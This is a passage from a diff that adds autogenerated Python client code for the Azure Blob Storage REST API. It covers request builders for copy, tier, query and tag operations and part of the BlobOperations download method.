_SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-requires-sync'] = _SERIALIZER.header("x_ms_requires_sync", x_ms_requires_sync, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = 
_SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("copy_source", copy_source, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if source_content_md5 is not None: + _header_parameters['x-ms-source-content-md5'] = _SERIALIZER.header("source_content_md5", source_content_md5, 'bytearray') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + if copy_source_authorization is not None: + _header_parameters['x-ms-copy-source-authorization'] = _SERIALIZER.header("copy_source_authorization", copy_source_authorization, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if copy_source_tags is not None: + _header_parameters['x-ms-copy-source-tag-option'] = _SERIALIZER.header("copy_source_tags", copy_source_tags, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_abort_copy_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "copy") # type: str + copy_action_abort_constant = kwargs.pop('copy_action_abort_constant', "abort") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + copy_id = kwargs.pop('copy_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['copyid'] = _SERIALIZER.query("copy_id", copy_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-copy-action'] = _SERIALIZER.header("copy_action_abort_constant", copy_action_abort_constant, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_tier_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "tier") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + tier = kwargs.pop('tier') # type: Union[str, "_models.AccessTierRequired"] + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + version_id = kwargs.pop('version_id', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + rehydrate_priority = kwargs.pop('rehydrate_priority', None) # type: Optional[Union[str, "_models.RehydratePriority"]] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if version_id is not None: + _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if rehydrate_priority is not None: + _header_parameters['x-ms-rehydrate-priority'] = _SERIALIZER.header("rehydrate_priority", rehydrate_priority, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_account_info_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest
+    restype = kwargs.pop('restype', "account")  # type: str
+    comp = kwargs.pop('comp', "properties")  # type: str
+    version = kwargs.pop('version', "2021-04-10")  # type: str
+
+    accept = "application/xml"
+    # Construct URL
+    _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}")
+    path_format_arguments = {
+        "url": _SERIALIZER.url("url", url, 'str', skip_quote=True),
+    }
+
+    _url = _format_url_section(_url, **path_format_arguments)
+
+    # Construct parameters
+    _query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
+    _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str')
+    _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str')
+
+    # Construct headers
+    _header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
+    _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str')
+    _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
+
+    return HttpRequest(
+        method="GET",
+        url=_url,
+        params=_query_parameters,
+        headers=_header_parameters,
+        **kwargs
+    )
+
+
+def build_query_request(
+    url,  # type: str
+    **kwargs  # type: Any
+):
+    # type: (...) -> HttpRequest
+    comp = kwargs.pop('comp', "query")  # type: str
+    version = kwargs.pop('version', "2021-04-10")  # type: str
+    content_type = kwargs.pop('content_type', None)  # type: Optional[str]
+    snapshot = kwargs.pop('snapshot', None)  # type: Optional[str]
+    timeout = kwargs.pop('timeout', None)  # type: Optional[int]
+    lease_id = kwargs.pop('lease_id', None)  # type: Optional[str]
+    encryption_key = kwargs.pop('encryption_key', None)  # type: Optional[str]
+    encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None)  # type: Optional[str]
+    encryption_algorithm = kwargs.pop('encryption_algorithm', None)  # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]]
+    if_modified_since = kwargs.pop('if_modified_since', None)  # type: Optional[datetime.datetime]
+    if_unmodified_since = kwargs.pop('if_unmodified_since', None)  # type: Optional[datetime.datetime]
+    if_match = kwargs.pop('if_match', None)  # type: Optional[str]
+    if_none_match = kwargs.pop('if_none_match', None)  # type: Optional[str]
+    if_tags = kwargs.pop('if_tags', None)  # type: Optional[str]
+    request_id_parameter = kwargs.pop('request_id_parameter', None)  # type: Optional[str]
+
+    accept = "application/xml"
+    # Construct URL
+    _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}")
+    path_format_arguments = {
+        "url": _SERIALIZER.url("url", url, 'str', skip_quote=True),
+    }
+
+    _url = _format_url_section(_url, **path_format_arguments)
+
+    # Construct parameters
+    _query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
+    _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str')
+    if snapshot is not None:
+        _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str')
+    if timeout is not None:
+        _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0)
+
+    # Construct headers
+    _header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
+    if lease_id is not None:
+        _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str')
+    if encryption_key is not None:
+        _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str')
+    if encryption_key_sha256 is not None:
+        _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str')
+    if encryption_algorithm is not None:
+        _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str')
+    if if_modified_since is not None:
+        _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123')
+    if if_unmodified_since is not None:
+        _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
+    if if_match is not None:
+        _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str')
+    if if_none_match is not None:
+        _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str')
+    if if_tags is not None:
+        _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str')
+    _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str')
+    if request_id_parameter is not None:
+        _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str')
+    if content_type is not None:
+        _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
+    _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
+
+    return HttpRequest(
+        method="POST",
+        url=_url,
+        params=_query_parameters,
+        headers=_header_parameters,
+        **kwargs
+    )
+
+
+def build_get_tags_request(
+    url,  # type: str
+    **kwargs  # type: Any
+):
+    # type: (...) -> HttpRequest
+    comp = kwargs.pop('comp', "tags")  # type: str
+    version = kwargs.pop('version', "2021-04-10")  # type: str
+    timeout = kwargs.pop('timeout', None)  # type: Optional[int]
+    request_id_parameter = kwargs.pop('request_id_parameter', None)  # type: Optional[str]
+    snapshot = kwargs.pop('snapshot', None)  # type: Optional[str]
+    version_id = kwargs.pop('version_id', None)  # type: Optional[str]
+    if_tags = kwargs.pop('if_tags', None)  # type: Optional[str]
+    lease_id = kwargs.pop('lease_id', None)  # type: Optional[str]
+
+    accept = "application/xml"
+    # Construct URL
+    _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}")
+    path_format_arguments = {
+        "url": _SERIALIZER.url("url", url, 'str', skip_quote=True),
+    }
+
+    _url = _format_url_section(_url, **path_format_arguments)
+
+    # Construct parameters
+    _query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
+    _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str')
+    if timeout is not None:
+        _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0)
+    if snapshot is not None:
+        _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str')
+    if version_id is not None:
+        _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str')
+
+    # Construct headers
+    _header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
+    _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str')
+    if request_id_parameter is not None:
+        _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str')
+    if if_tags is not None:
+        _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str')
+    if lease_id is not None:
+        _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str')
+    _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
+
+    return HttpRequest(
+        method="GET",
+        url=_url,
+        params=_query_parameters,
+        headers=_header_parameters,
+        **kwargs
+    )
+
+
+def build_set_tags_request(
+    url,  # type: str
+    **kwargs  # type: Any
+):
+    # type: (...) -> HttpRequest
+    comp = kwargs.pop('comp', "tags")  # type: str
+    version = kwargs.pop('version', "2021-04-10")  # type: str
+    content_type = kwargs.pop('content_type', None)  # type: Optional[str]
+    timeout = kwargs.pop('timeout', None)  # type: Optional[int]
+    version_id = kwargs.pop('version_id', None)  # type: Optional[str]
+    transactional_content_md5 = kwargs.pop('transactional_content_md5', None)  # type: Optional[bytearray]
+    transactional_content_crc64 = kwargs.pop('transactional_content_crc64', None)  # type: Optional[bytearray]
+    request_id_parameter = kwargs.pop('request_id_parameter', None)  # type: Optional[str]
+    if_tags = kwargs.pop('if_tags', None)  # type: Optional[str]
+    lease_id = kwargs.pop('lease_id', None)  # type: Optional[str]
+
+    accept = "application/xml"
+    # Construct URL
+    _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}")
+    path_format_arguments = {
+        "url": _SERIALIZER.url("url", url, 'str', skip_quote=True),
+    }
+
+    _url = _format_url_section(_url, **path_format_arguments)
+
+    # Construct parameters
+    _query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
+    _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str')
+    if timeout is not None:
+        _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0)
+    if version_id is not None:
+        _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str')
+
+    # Construct headers
+    _header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
+    _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str')
+    if transactional_content_md5 is not None:
+        _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray')
+    if transactional_content_crc64 is not None:
+        _header_parameters['x-ms-content-crc64'] = _SERIALIZER.header("transactional_content_crc64", transactional_content_crc64, 'bytearray')
+    if request_id_parameter is not None:
+        _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str')
+    if if_tags is not None:
+        _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str')
+    if lease_id is not None:
+        _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str')
+    if content_type is not None:
+        _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
+    _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
+
+    return HttpRequest(
+        method="PUT",
+        url=_url,
+        params=_query_parameters,
+        headers=_header_parameters,
+        **kwargs
+    )
+
+# fmt: on
+class BlobOperations(object):  # pylint: disable=too-many-public-methods
+    """
+    .. warning::
+        **DO NOT** instantiate this class directly.
+
+        Instead, you should access the following operations through
+        :class:`~azure.storage.blob.AzureBlobStorage`'s
+        :attr:`blob` attribute.
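+
+    Usage illustration only (a sketch, not part of the generated contract): it assumes the
+    client is constructed with the full URL of an existing blob and an already-configured
+    authentication pipeline; the account, container, and blob names are hypothetical::
+
+        from azure.storage.blob import AzureBlobStorage
+
+        client = AzureBlobStorage(url="https://myaccount.blob.core.windows.net/mycontainer/myblob.txt")
+        stream = client.blob.download(timeout=30)   # returns a streaming IO body
+        client.blob.get_properties()                # raises HttpResponseError on failure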
+ """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def download( + self, + snapshot=None, # type: Optional[str] + version_id=None, # type: Optional[str] + timeout=None, # type: Optional[int] + range=None, # type: Optional[str] + range_get_content_md5=None, # type: Optional[bool] + range_get_content_crc64=None, # type: Optional[bool] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> IO + """The Download operation reads or downloads a blob from the system, including its metadata and + properties. You can also call Download to read a snapshot. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param range_get_content_md5: When set to true and specified together with the Range, the + service returns the MD5 hash for the range, as long as the range is less than or equal to 4 MB + in size. Default value is None. + :type range_get_content_md5: bool + :param range_get_content_crc64: When set to true and specified together with the Range, the + service returns the CRC64 hash for the range, as long as the range is less than or equal to 4 + MB in size. Default value is None. + :type range_get_content_crc64: bool + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. 
+        :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: IO, or the result of cls(response)
+        :rtype: IO
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType[IO]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        _lease_id = None
+        _encryption_key = None
+        _encryption_key_sha256 = None
+        _encryption_algorithm = None
+        _if_modified_since = None
+        _if_unmodified_since = None
+        _if_match = None
+        _if_none_match = None
+        _if_tags = None
+        if lease_access_conditions is not None:
+            _lease_id = lease_access_conditions.lease_id
+        if cpk_info is not None:
+            _encryption_key = cpk_info.encryption_key
+            _encryption_key_sha256 = cpk_info.encryption_key_sha256
+            _encryption_algorithm = cpk_info.encryption_algorithm
+        if modified_access_conditions is not None:
+            _if_modified_since = modified_access_conditions.if_modified_since
+            _if_unmodified_since = modified_access_conditions.if_unmodified_since
+            _if_match = modified_access_conditions.if_match
+            _if_none_match = modified_access_conditions.if_none_match
+            _if_tags = modified_access_conditions.if_tags
+
+        request = build_download_request(
+            url=self._config.url,
+            version=self._config.version,
+            snapshot=snapshot,
+            version_id=version_id,
+            timeout=timeout,
+            range=range,
+            lease_id=_lease_id,
+            range_get_content_md5=range_get_content_md5,
+            range_get_content_crc64=range_get_content_crc64,
+            encryption_key=_encryption_key,
+            encryption_key_sha256=_encryption_key_sha256,
+            encryption_algorithm=_encryption_algorithm,
+            if_modified_since=_if_modified_since,
+            if_unmodified_since=_if_unmodified_since,
+            if_match=_if_match,
+            if_none_match=_if_none_match,
+            if_tags=_if_tags,
+            request_id_parameter=request_id_parameter,
+            template_url=self.download.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=True,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [200, 206]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        if response.status_code == 200:
+            response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
+            response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta'))
+            response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id'))
+            response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or'))
+            response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
+            response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
+            response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range'))
+            response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
+            response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5'))
+            response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
+            response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
+            response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
+            response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
+            response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number'))
+            response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type'))
+            response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time'))
+            response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description'))
+            response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id'))
+            response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress'))
+            response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source'))
+            response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status'))
+            response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
+            response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
+            response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))
+            response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+            response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+            response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+            response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id'))
+            response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version'))
+            response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
+            response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+            response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count'))
+            response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted'))
+            response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256'))
+            response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope'))
+            response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5'))
+            response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count'))
+            response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed'))
+            response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time'))
+            response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date'))
+            response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode'))
+            response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold'))
+
+            deserialized = response.stream_download(self._client._pipeline)
+
+        if response.status_code == 206:
+            response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
+            response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta'))
+            response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id'))
+            response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or'))
+            response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
+            response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
+            response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range'))
+            response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
+            response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5'))
+            response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
+            response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
+            response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
+            response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
+            response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number'))
+            response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type'))
+            response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64'))
+            response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time'))
+            response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description'))
+            response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id'))
+            response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress'))
+            response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source'))
+            response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status'))
+            response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
+            response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
+            response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))
+            response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+            response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+            response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+            response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id'))
+            response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version'))
+            response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
+            response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+            response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count'))
+            response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted'))
+            response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256'))
+            response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope'))
+            response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5'))
+            response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count'))
